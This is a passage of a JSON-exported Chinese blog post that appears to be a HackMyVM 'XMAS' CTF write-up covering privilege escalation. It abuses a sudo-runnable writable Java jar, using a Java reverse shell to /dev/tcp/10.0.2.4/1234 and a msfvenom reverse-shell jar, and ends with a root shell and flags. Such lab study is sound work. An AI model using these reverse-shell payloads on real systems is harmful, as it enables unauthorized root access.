src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402135342940\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u770b\u6765\u662f\u4f1a\u5b9a\u65f6\u89e6\u53d1\u7684\uff0c\u6211\u548b\u6ca1\u641c\u96c6\u5230\u5462\u3002\u3002<\/p>\n<p>\u4e0a\u4f20\u4e00\u4e2a<code>pspy64<\/code>\u770b\u770b\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423600.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423600.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402140305523\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u53d1\u73b0\u5b9a\u65f6\u4efb\u52a1\u4e86\u3002\u3002\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423601.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404021423601.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240402140547914\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u989d\u3002\u3002\u3002\u3002\u3002<\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">alabaster@xmas:~$ sudo -l\nsudo -l\nMatching Defaults entries for alabaster on xmas:\n    env_reset, mail_badpass,\n    secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin,\n    use_pty\n\nUser alabaster may run the following commands on xmas:\n    (ALL : ALL) ALL\n    (ALL) NOPASSWD: \/usr\/bin\/java -jar\n        \/home\/alabaster\/PublishList\/PublishList.jar\nalabaster@xmas:~$ cd \/home\/alabaster\/PublishList\/\ncd \/home\/alabaster\/PublishList\/\nalabaster@xmas:~\/PublishList$ ls -la\nls -la\ntotal 28\ndrwxrwxr-x 2 alabaster alabaster 4096 Nov 20 18:45 .\ndrwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 ..\n-rw-rw-r-- 1 alabaster alabaster   38 Nov 20 18:45 manifest.mf\n-rw-rw-r-- 1 alabaster alabaster   24 Nov 20 18:44 MANIFEST.MF\n-rw-rw-r-- 1 alabaster alabaster 1760 Nov 20 18:45 PublishList.class\n-rw-rw-r-- 1 alabaster alabaster 1477 Nov 20 18:45 PublishList.jar\n-rw-rw-r-- 1 alabaster alabaster 1182 Nov 20 18:44 PublishList.java<\/code><\/pre>\n<p>\u53d1\u73b0\u662f\u53ef\u5199\u7684\uff0c\u627e\u4e00\u4e0bjava\u7684\u53cd\u5f39shell\uff1a<\/p>\n<pre><code class=\"language-java\">public class shell {\n    public static void main(String[] args) {\n        Process p;\n        try {\n            p = Runtime.getRuntime().exec(&quot;bash -c $@|bash 0 echo bash -i &gt;&amp; \/dev\/tcp\/10.0.2.4\/1234 0&gt;&amp;1&quot;);\n            p.waitFor();\n            p.destroy();\n        } catch (Exception e) {}\n    }\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u81ea\u5df1\u7f16\u8bd1\u4e00\u4e0b\uff0c\u518d\u4e0a\u4f20\uff0c\u6211\u76f4\u63a5\u4f7f\u7528msf\u751f\u6210\u4e86\uff1a<\/p>\n<pre><code class=\"language-bash\">msfvenom -p java\/shell_reverse_tcp LHOST=10.0.2.4 LPORT=1234 -f jar -o shell.jar\npython3 -m http.server 8888<\/code><\/pre>\n<pre><code class=\"language-bash\">mv PublishList.jar PublishList.jar.bak\nmv shell.jar PublishList.jar\nsudo \/usr\/bin\/java -jar \/home\/alabaster\/PublishList\/PublishList.jar\n# \u8fd9\u91cc\u8981\u7528\u7edd\u5bf9\u8def\u5f84\u54e6<\/code><\/pre>\n<p>\u7136\u540e\u5c31\u4f1a\u5f39\u4e00\u4e2a<code>rootshell<\/code>\u5230<code>1234<\/code>\u76d1\u542c\u7aef\u53e3\u4e0a\u9762\u53bb\uff1a<\/p>\n<pre><code class=\"language-css\">[02:15:50] Welcome to pwncat \ud83d\udc08!                                                                                                             __main__.py:164[02:20:14] received connection from 10.0.2.18:39176                                                                                               bind.py:84[02:20:15] 0.0.0.0:1234: upgrading from \/usr\/bin\/dash to \/usr\/bin\/bash                                                                        manager.py:957           10.0.2.18:39176: registered new host w\/ db                                                                                         manager.py:957\n(local) pwncat$                                                                                                                                             \n(remote) root@xmas:\/home\/alabaster\/PublishList# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\n(remote) root@xmas:\/home\/alabaster\/PublishList# cd ..\/;ls -la\ntotal 60\ndrwxr-x--- 7 alabaster alabaster 4096 Nov 20 18:43 .\ndrwxr-xr-x 9 root      root      4096 Nov 19 22:29 ..\n-rw------- 1 alabaster alabaster  791 Nov 20 19:28 .bash_history\n-rw-r--r-- 1 alabaster alabaster  220 Jan  7  2023 .bash_logout\n-rw-r--r-- 1 alabaster alabaster 3771 Jan  7  2023 .bashrc\ndrwx------ 3 alabaster alabaster 4096 Nov 19 11:07 .cache\ndrwxrwxr-x 4 alabaster alabaster 4096 Nov 19 11:08 .local\n-rw-rw-r-- 1 alabaster alabaster   43 Apr  2 05:38 naughty_list.txt\n-rw-rw-r-- 1 alabaster alabaster   35 Apr  2 05:38 nice_list.txt\ndrwxrwxr-x 2 alabaster alabaster 4096 Nov 19 21:50 NiceOrNaughty\n-rw-r--r-- 1 alabaster alabaster  807 Jan  7  2023 .profile\ndrwxrwxr-x 2 alabaster alabaster 4096 Apr  2 06:18 PublishList\n-rw-rw-r-- 1 alabaster alabaster   66 Nov 19 21:43 .selected_editor\ndrwx------ 2 alabaster alabaster 4096 Nov 17 17:32 .ssh\n-rw-r--r-- 1 alabaster alabaster    0 Nov 17 17:34 .sudo_as_admin_successful\n-rw-rw---- 1 alabaster alabaster  849 Nov 19 09:08 user.txt\n(remote) root@xmas:\/home\/alabaster# cat user.txt\n    ||::|:||   .--------,\n    |:||:|:|   |_______ \/        .-.\n    ||::|:|| .&quot;`  ___  `&quot;.    {\\(&#039;v&#039;)\/}\n    \\\\\\\/\\\/\/\/:  .&#039;`   `&#039;.  ;____`(   )&#039;___________________________\n     \\====\/ &#039;.\/  o   o  \\|~     ^&quot; &quot;^                          \/\/\n      \\\\\/\/   |   ())) .  |   Merry Christmas!                   \\\n       ||     \\ `.__.&#039;  \/|                                     \/\/\n       ||   _{``-.___.-&#039;\\|   Flag: HMV{7bMJ6js7guhQadYDTmBt}    \\\n       || _.&quot; `-.____.-&#039;`|    ___                              \/\/\n       ||`        __ \\   |___\/   \\______________________________\\\n     .&quot;||        (__) \\    \\|     \/\n    \/   `\\\/       __   vvvvv&#039;\\___\/\n    |     |      (__)        |\n     \\___\/\\                 \/\n       ||  |     .___.     |\n       ||  |       |       |\n       ||.-&#039;       |       &#039;-.\n       ||          |          )\n       ||----------&#039;---------&#039;\n(remote) root@xmas:\/home\/alabaster# cat \/root\/root.txt\n      __,_,_,___)          _______\n    (--| | |             (--\/    ),_)        ,_) \n       | | |  _ ,_,_        |     |_ ,_ &#039; , _|_,_,_, _  ,\n     __| | | (\/_| | (_|     |     | ||  |\/_)_| | | |(_|\/_)___,\n    (      |___,   ,__|     \\____)  |__,           |__,\n\n                            |                         _...._\n                         \\  _  \/                    .::o:::::.\n                          (\\o\/)                    .:::&#039;&#039;&#039;&#039;:o:.\n                      ---  \/ \\  ---                :o:_    _:::\n                           &gt;*&lt;                     `:}_&gt;()&lt;_{:&#039;\n                          &gt;0&lt;@&lt;                 @    `&#039;\/\/\\\\&#039;`    @ \n                         &gt;&gt;&gt;@&lt;&lt;*              @ #     \/\/  \\\\     # @\n                        &gt;@&gt;*&lt;0&lt;&lt;&lt;           __#_#____\/&#039;____&#039;\\____#_#__\n                       &gt;*&gt;&gt;@&lt;&lt;&lt;@&lt;&lt;         [__________________________]\n                      &gt;@&gt;&gt;0&lt;&lt;&lt;*&lt;&lt;@&lt;         |=_- .-\/\\ \/\\ \/\\ \/\\--. =_-|\n                     &gt;*&gt;&gt;0&lt;&lt;@&lt;&lt;&lt;@&lt;&lt;&lt;        |-_= | \\ \\\\ \\\\ \\\\ \\ |-_=-|\n                    &gt;@&gt;&gt;*&lt;&lt;@&lt;&gt;*&lt;&lt;0&lt;*&lt;       |_=-=| \/ \/\/ \/\/ \/\/ \/ |_=-_|\n      \\*\/          &gt;0&gt;&gt;*&lt;&lt;@&lt;&gt;0&gt;&lt;&lt;*&lt;@&lt;&lt;      |=_- |`-&#039;`-&#039;`-&#039;`-&#039;  |=_=-|\n  ___\\\\U\/\/___     &gt;*&gt;&gt;@&gt;&lt;0&lt;&lt;*&gt;&gt;@&gt;&lt;*&lt;0&lt;&lt;     | =_-| o          o |_==_| \n  |\\\\ | | \\\\|    &gt;@&gt;&gt;0&lt;*&lt;&lt;0&gt;&gt;@&lt;&lt;0&lt;&lt;&lt;*&lt;@&lt;    |=_- | !     (    ! |=-_=|\n  | \\\\| | _(UU)_ &gt;((*))_&gt;0&gt;&lt;*&lt;0&gt;&lt;@&lt;&lt;&lt;0&lt;*&lt;  _|-,-=| !    ).    ! |-_-=|_\n  |\\ \\| || \/ \/\/||.*.*.*.|&gt;&gt;@&lt;&lt;*&lt;&lt;@&gt;&gt;&lt;0&lt;&lt;@&lt;\/=-((=_| ! __(:&#039;)__ ! |=_==_-\\\n  |\\\\_|_|&amp;&amp;_\/\/ ||*.*.*.*|_\\\\db\/\/__     (\\_\/)-=))-|\/^\\=^=^^=^=\/^\\| _=-_-_\\\n  &quot;&quot;&quot;&quot;|&#039;.&#039;.&#039;.|~~|.*.*.*|     ____|_   =(&#039;.&#039;)=\/\/   ,------------.      \n      |&#039;.&#039;.&#039;.|   ^^^^^^|____|&gt;&gt;&gt;&gt;&gt;&gt;|  ( ~~~ )\/   (((((((())))))))   \n      ~~~~~~~~         &#039;&quot;&quot;&quot;&quot;`------&#039;  `w---w`     `------------&#039;\n      Flag HMV{GUbM4sBXzvwf7eC9bNL4}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>XMAS \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf rustscan -a 10.0.2.18 &#8212; -A Open 10.0.2. [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-487","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/487","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=487"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/487\/revisions"}],"predecessor-version":[{"id":488,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/487\/revisions\/488"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=487"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=487"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=487"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}